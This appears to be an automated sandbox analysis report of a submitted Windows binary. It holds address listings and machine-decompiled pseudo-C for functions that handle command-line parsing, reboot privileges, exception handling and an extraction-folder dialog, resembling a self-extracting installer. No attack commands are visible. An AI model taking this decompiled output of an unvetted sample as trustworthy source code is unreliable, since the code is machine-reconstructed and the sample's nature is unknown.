                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5f7f
                                                                                                                                                                                                      0x000e5ec3
                                                                                                                                                                                                      0x000e5ec3
                                                                                                                                                                                                      0x000e5ecc
                                                                                                                                                                                                      0x000e5ed4
                                                                                                                                                                                                      0x000e5ed6
                                                                                                                                                                                                      0x000e5edc
                                                                                                                                                                                                      0x000e5edf
                                                                                                                                                                                                      0x000e5eea
                                                                                                                                                                                                      0x000e5eed
                                                                                                                                                                                                      0x000e5f3f
                                                                                                                                                                                                      0x000e5f40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5eef
                                                                                                                                                                                                      0x000e5eef
                                                                                                                                                                                                      0x000e5ef2
                                                                                                                                                                                                      0x000e5f34
                                                                                                                                                                                                      0x000e5ef4
                                                                                                                                                                                                      0x000e5ef4
                                                                                                                                                                                                      0x000e5ef7
                                                                                                                                                                                                      0x000e5f2b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5ef9
                                                                                                                                                                                                      0x000e5ef9
                                                                                                                                                                                                      0x000e5efc
                                                                                                                                                                                                      0x000e5f22
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5efe
                                                                                                                                                                                                      0x000e5eff
                                                                                                                                                                                                      0x000e5f02
                                                                                                                                                                                                      0x000e5f16
                                                                                                                                                                                                      0x000e5f04
                                                                                                                                                                                                      0x000e5f07
                                                                                                                                                                                                      0x000e5f0d
                                                                                                                                                                                                      0x000e5f46
                                                                                                                                                                                                      0x000e5f46
                                                                                                                                                                                                      0x000e5f09
                                                                                                                                                                                                      0x000e5f09
                                                                                                                                                                                                      0x000e5f09
                                                                                                                                                                                                      0x000e5f07
                                                                                                                                                                                                      0x000e5f02
                                                                                                                                                                                                      0x000e5efc
                                                                                                                                                                                                      0x000e5ef7
                                                                                                                                                                                                      0x000e5ef2
                                                                                                                                                                                                      0x000e5f4c
                                                                                                                                                                                                      0x000e5f4e
                                                                                                                                                                                                      0x000e5f50
                                                                                                                                                                                                      0x000e5f54
                                                                                                                                                                                                      0x000e5ed4
                                                                                                                                                                                                      0x000e5ea2
                                                                                                                                                                                                      0x000e5ea4
                                                                                                                                                                                                      0x000e5eaf
                                                                                                                                                                                                      0x000e5eaf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5e79
                                                                                                                                                                                                      0x000e5e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5e83
                                                                                                                                                                                                      0x000e5e83
                                                                                                                                                                                                      0x000e5e83
                                                                                                                                                                                                      0x000e5e85
                                                                                                                                                                                                      0x000e5e85
                                                                                                                                                                                                      0x000e5e8e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5e94
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5e94
                                                                                                                                                                                                      0x000e5e8e
                                                                                                                                                                                                      0x000e5e7d
                                                                                                                                                                                                      0x000e5e77
                                                                                                                                                                                                      0x000e5e6e
                                                                                                                                                                                                      0x000e5e65
                                                                                                                                                                                                      0x000e5e5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5dd0
                                                                                                                                                                                                      0x000e5dd0
                                                                                                                                                                                                      0x000e5dd0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5dd0
                                                                                                                                                                                                      0x000e5dce
                                                                                                                                                                                                      0x000e5dca
                                                                                                                                                                                                      0x000e5dba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5d00
                                                                                                                                                                                                      0x000e5dd9
                                                                                                                                                                                                      0x000e5e04
                                                                                                                                                                                                      0x000e61fe
                                                                                                                                                                                                      0x000e5e0a
                                                                                                                                                                                                      0x000e5e0c
                                                                                                                                                                                                      0x000e5e17
                                                                                                                                                                                                      0x000e5e17
                                                                                                                                                                                                      0x000e5e04
                                                                                                                                                                                                      0x000e6200
                                                                                                                                                                                                      0x000e6200
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 000E5CEE
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(000E8B3E,00000104,00000000,?,?), ref: 000E5DFC
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 000E5E3E
                                                                                                                                                                                                      • CharUpperA.USER32(-00000052), ref: 000E5EE1
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 000E5F6F
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 000E5FA7
                                                                                                                                                                                                      • CharUpperA.USER32(-0000004E), ref: 000E6008
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 000E60AA
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000E1140,00000000,00000040,00000000), ref: 000E61F1
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 000E61F8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                      • String ID: "$"$:$RegServer
                                                                                                                                                                                                      • API String ID: 1203814774-25366791
                                                                                                                                                                                                      • Opcode ID: 3332f24a7afd1fd2b1b0fcf1f896709a923378b19542c703801f9875806f322d
                                                                                                                                                                                                      • Instruction ID: a087be501d7ca63524275be81a1f20536576f65e2e0025f5af94103d8b26044c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3332f24a7afd1fd2b1b0fcf1f896709a923378b19542c703801f9875806f322d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CD19331A04AD45EEFB98B3B9C483FE37E1972634EF1848F9C496F6151DA758E818B01
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                                                                      			E000E1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				int _t28;
                                                                                                                                                                                                      				signed char _t30;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t41 = __esi;
                                                                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						if( *0xe9a40 != 0) {
                                                                                                                                                                                                      							_pop(_t30);
                                                                                                                                                                                                      							_t44 = _t46;
                                                                                                                                                                                                      							_t13 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                      							_push(_t38);
                                                                                                                                                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                      								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                      								_v12 = 2;
                                                                                                                                                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                      								CloseHandle(_v28);
                                                                                                                                                                                                      								_t41 = _t41;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                      										_t25 = 1;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t37 = 0x4f7;
                                                                                                                                                                                                      										goto L3;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t37 = 0x4f6;
                                                                                                                                                                                                      									goto L4;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t37 = 0x4f5;
                                                                                                                                                                                                      								L3:
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								L4:
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								E000E44B9(0, _t37);
                                                                                                                                                                                                      								_t25 = 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_pop(_t40);
                                                                                                                                                                                                      							return E000E6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t37 = 0x522;
                                                                                                                                                                                                      						_t28 = E000E44B9(0, 0x522, 0xe1140, 0, 0x40, 4);
                                                                                                                                                                                                      						if(_t28 != 6) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					__eax = E000E1EA7(__ecx);
                                                                                                                                                                                                      					if(__eax != 2) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						return _t28;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

















                                                                                                                                                                                                      0x000e1f90
                                                                                                                                                                                                      0x000e1f90
                                                                                                                                                                                                      0x000e1f93
                                                                                                                                                                                                      0x000e1f98
                                                                                                                                                                                                      0x000e1fa4
                                                                                                                                                                                                      0x000e1fa7
                                                                                                                                                                                                      0x000e1fc5
                                                                                                                                                                                                      0x000e1fcd
                                                                                                                                                                                                      0x000e1fdb
                                                                                                                                                                                                      0x000e1ee5
                                                                                                                                                                                                      0x000e1eea
                                                                                                                                                                                                      0x000e1ef1
                                                                                                                                                                                                      0x000e1ef4
                                                                                                                                                                                                      0x000e1f0c
                                                                                                                                                                                                      0x000e1f2e
                                                                                                                                                                                                      0x000e1f3a
                                                                                                                                                                                                      0x000e1f46
                                                                                                                                                                                                      0x000e1f4d
                                                                                                                                                                                                      0x000e1f58
                                                                                                                                                                                                      0x000e1f60
                                                                                                                                                                                                      0x000e1f61
                                                                                                                                                                                                      0x000e1f62
                                                                                                                                                                                                      0x000e1f75
                                                                                                                                                                                                      0x000e1f80
                                                                                                                                                                                                      0x000e1f77
                                                                                                                                                                                                      0x000e1f77
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1f77
                                                                                                                                                                                                      0x000e1f64
                                                                                                                                                                                                      0x000e1f64
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1f64
                                                                                                                                                                                                      0x000e1f0e
                                                                                                                                                                                                      0x000e1f0e
                                                                                                                                                                                                      0x000e1f13
                                                                                                                                                                                                      0x000e1f13
                                                                                                                                                                                                      0x000e1f14
                                                                                                                                                                                                      0x000e1f14
                                                                                                                                                                                                      0x000e1f16
                                                                                                                                                                                                      0x000e1f17
                                                                                                                                                                                                      0x000e1f1a
                                                                                                                                                                                                      0x000e1f1f
                                                                                                                                                                                                      0x000e1f1f
                                                                                                                                                                                                      0x000e1f86
                                                                                                                                                                                                      0x000e1f8f
                                                                                                                                                                                                      0x000e1fcf
                                                                                                                                                                                                      0x000e1fd3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1fd3
                                                                                                                                                                                                      0x000e1fa9
                                                                                                                                                                                                      0x000e1fb4
                                                                                                                                                                                                      0x000e1fbb
                                                                                                                                                                                                      0x000e1fc3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1fc3
                                                                                                                                                                                                      0x000e1f9a
                                                                                                                                                                                                      0x000e1f9a
                                                                                                                                                                                                      0x000e1fa2
                                                                                                                                                                                                      0x000e1fd9
                                                                                                                                                                                                      0x000e1fda
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1fa2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 000E1EFB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 000E1F02
                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 000E1FD3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                      • API String ID: 2795981589-3733053543
                                                                                                                                                                                                      • Opcode ID: 9137a0dd8087de19090558a1bae02be3430812281fb5742e531c91e00d87c233
                                                                                                                                                                                                      • Instruction ID: 5b27f61ebbade4ab12924b2d6ef32b6f1965c040290f59cd2b7acf42f3060c24
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9137a0dd8087de19090558a1bae02be3430812281fb5742e531c91e00d87c233
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6421BC71B402857FEB305BA29C49FFF77B8EB85B11F100029FA06F6181D779980196A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                      				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x000e6cf7
                                                                                                                                                                                                      0x000e6d00
                                                                                                                                                                                                      0x000e6d19

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,000E6E26,000E1000), ref: 000E6CF7
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(000E6E26,?,000E6E26,000E1000), ref: 000E6D00
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,000E6E26,000E1000), ref: 000E6D0B
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,000E6E26,000E1000), ref: 000E6D12
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                      • Opcode ID: 9f7c7bb7c2c50494bdc90a6d62b4345f48ddce4859f00a6c9e60feb662357508
                                                                                                                                                                                                      • Instruction ID: 8adffcbb0b7596d9994749a0bdea88eb9412600cb790b87f899ec532720a976a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f7c7bb7c2c50494bdc90a6d62b4345f48ddce4859f00a6c9e60feb662357508
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5D0C932200188BBFB002BE1EC4CA593F28EB8FA12F454085F319AA020CA3A64518B52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                                                                      			E000E3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				int _t20;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				int _t23;
                                                                                                                                                                                                      				char _t24;
                                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                                      				int _t27;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				int _t38;
                                                                                                                                                                                                      				int _t39;
                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				CHAR* _t49;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				struct HWND__* _t64;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t64 = _a4;
                                                                                                                                                                                                      				_t6 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                      					EndDialog(_t64, ??);
                                                                                                                                                                                                      					L39:
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 = 1;
                                                                                                                                                                                                      				_t10 = _t6 - 0x100;
                                                                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                                                                      					E000E43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                      					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                      					__eflags =  *0xe9a40 - _t42; // 0x3
                                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L36:
                                                                                                                                                                                                      					return _t42;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t10 == _t42) {
                                                                                                                                                                                                      					_t20 = _a12 - 1;
                                                                                                                                                                                                      					__eflags = _t20;
                                                                                                                                                                                                      					if(_t20 == 0) {
                                                                                                                                                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0xe91e4, 0x104);
                                                                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                                                                      						if(_t21 == 0) {
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							_t58 = 0x4bf;
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							E000E44B9(_t64, _t58);
                                                                                                                                                                                                      							goto L39;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t49 = 0xe91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t23 =  *_t49;
                                                                                                                                                                                                      							_t49 =  &(_t49[1]);
                                                                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                                                                      						} while (_t23 != 0);
                                                                                                                                                                                                      						__eflags = _t49 - 0xe91e5 - 3;
                                                                                                                                                                                                      						if(_t49 - 0xe91e5 < 3) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 =  *0xe91e5; // 0x3a
                                                                                                                                                                                                      						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                      						if(_t24 == 0x3a) {
                                                                                                                                                                                                      							L21:
                                                                                                                                                                                                      							_t25 = GetFileAttributesA(0xe91e4);
                                                                                                                                                                                                      							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                      							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      								L26:
                                                                                                                                                                                                      								E000E658A(0xe91e4, 0x104, 0xe1140);
                                                                                                                                                                                                      								_t27 = E000E58C8(0xe91e4);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 != 0) {
                                                                                                                                                                                                      									__eflags =  *0xe91e4 - 0x5c;
                                                                                                                                                                                                      									if( *0xe91e4 != 0x5c) {
                                                                                                                                                                                                      										L30:
                                                                                                                                                                                                      										_t30 = E000E597D(0xe91e4, 1, _t64, 1);
                                                                                                                                                                                                      										__eflags = _t30;
                                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                                      											L35:
                                                                                                                                                                                                      											_t42 = 1;
                                                                                                                                                                                                      											__eflags = 1;
                                                                                                                                                                                                      											goto L36;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t42 = 1;
                                                                                                                                                                                                      										EndDialog(_t64, 1);
                                                                                                                                                                                                      										goto L36;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0xe91e5 - 0x5c;
                                                                                                                                                                                                      									if( *0xe91e5 == 0x5c) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L30;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t58 = 0x4be;
                                                                                                                                                                                                      								goto L25;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t32 = E000E44B9(_t64, 0x54a, 0xe91e4, 0, 0x20, 4);
                                                                                                                                                                                                      							__eflags = _t32 - 6;
                                                                                                                                                                                                      							if(_t32 != 6) {
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t33 = CreateDirectoryA(0xe91e4, 0);
                                                                                                                                                                                                      							__eflags = _t33;
                                                                                                                                                                                                      							if(_t33 != 0) {
                                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0xe91e4);
                                                                                                                                                                                                      							_t58 = 0x4cb;
                                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags =  *0xe91e4 - 0x5c;
                                                                                                                                                                                                      						if( *0xe91e4 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                      						if(_t24 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t34 = _t20 - 1;
                                                                                                                                                                                                      					__eflags = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						EndDialog(_t64, 0);
                                                                                                                                                                                                      						 *0xe9124 = 0x800704c7;
                                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t34 != 0x834;
                                                                                                                                                                                                      					if(_t34 != 0x834) {
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t37 = LoadStringA( *0xe9a3c, 0x3e8, 0xe8598, 0x200);
                                                                                                                                                                                                      					__eflags = _t37;
                                                                                                                                                                                                      					if(_t37 != 0) {
                                                                                                                                                                                                      						_t38 = E000E4224(_t64, _t46, _t46);
                                                                                                                                                                                                      						__eflags = _t38;
                                                                                                                                                                                                      						if(_t38 == 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0xe87a0);
                                                                                                                                                                                                      						__eflags = _t39;
                                                                                                                                                                                                      						if(_t39 != 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t63 = 0x4c0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						E000E44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L38;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = 0x4b1;
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}

























                                                                                                                                                                                                      0x000e321b
                                                                                                                                                                                                      0x000e321e
                                                                                                                                                                                                      0x000e3221
                                                                                                                                                                                                      0x000e343c
                                                                                                                                                                                                      0x000e343e
                                                                                                                                                                                                      0x000e343f
                                                                                                                                                                                                      0x000e3445
                                                                                                                                                                                                      0x000e3447
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3447
                                                                                                                                                                                                      0x000e3229
                                                                                                                                                                                                      0x000e322a
                                                                                                                                                                                                      0x000e322f
                                                                                                                                                                                                      0x000e33ec
                                                                                                                                                                                                      0x000e33f7
                                                                                                                                                                                                      0x000e3410
                                                                                                                                                                                                      0x000e3416
                                                                                                                                                                                                      0x000e341d
                                                                                                                                                                                                      0x000e342d
                                                                                                                                                                                                      0x000e342d
                                                                                                                                                                                                      0x000e3438
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3438
                                                                                                                                                                                                      0x000e3237
                                                                                                                                                                                                      0x000e3243
                                                                                                                                                                                                      0x000e3243
                                                                                                                                                                                                      0x000e3246
                                                                                                                                                                                                      0x000e32ee
                                                                                                                                                                                                      0x000e32f4
                                                                                                                                                                                                      0x000e32f6
                                                                                                                                                                                                      0x000e33d4
                                                                                                                                                                                                      0x000e33d6
                                                                                                                                                                                                      0x000e33db
                                                                                                                                                                                                      0x000e33dc
                                                                                                                                                                                                      0x000e33de
                                                                                                                                                                                                      0x000e33df
                                                                                                                                                                                                      0x000e3370
                                                                                                                                                                                                      0x000e3372
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3372
                                                                                                                                                                                                      0x000e32fc
                                                                                                                                                                                                      0x000e3301
                                                                                                                                                                                                      0x000e3301
                                                                                                                                                                                                      0x000e3303
                                                                                                                                                                                                      0x000e3304
                                                                                                                                                                                                      0x000e3304
                                                                                                                                                                                                      0x000e330a
                                                                                                                                                                                                      0x000e330d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3313
                                                                                                                                                                                                      0x000e3318
                                                                                                                                                                                                      0x000e331a
                                                                                                                                                                                                      0x000e3331
                                                                                                                                                                                                      0x000e3332
                                                                                                                                                                                                      0x000e333a
                                                                                                                                                                                                      0x000e333d
                                                                                                                                                                                                      0x000e337c
                                                                                                                                                                                                      0x000e3388
                                                                                                                                                                                                      0x000e338f
                                                                                                                                                                                                      0x000e3394
                                                                                                                                                                                                      0x000e3396
